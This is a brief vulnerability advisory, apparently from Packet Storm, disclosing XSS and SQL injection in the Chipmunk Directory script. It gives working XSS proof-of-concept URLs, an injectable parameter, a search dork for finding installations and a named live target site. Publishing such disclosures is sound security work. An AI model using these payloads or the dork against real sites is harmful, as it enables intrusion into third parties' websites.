Chipmunk Directory suffers from cross site scripting and SQL injection vulnerabilities.
75a8f70f132fb0b95a804223ed32dec307df92eb528f18bc73fd8170f7db57da#########################################################
---------------------------------------------------------
Portal Name: Chipmunk Directory
Vendor : https://www.chipmunk-scripts.com/page.php?ID=15
Download : https://www.chipmunk-scripts.com/directory/directory.zip
Vulnerable File's : index.php,recommend.php
Dork: Powered by (c) Chipmunk Directory
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (XSS/SQL)
---------------------------------------------------------
#########################################################
[XSS]:
https://www.site.com/directory/index.php?catid=1&start=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt
>
https://www.site.com/directory/recommend.php?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527Pouya_Server%2527)%3E%3C/IFRAME%3E
[SQL]:
https://www.site.com/directory/index.php?catid=1&start=[SQL]
---------------------------------
Victem :
https://www.chipmunk-scripts.com/directory
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed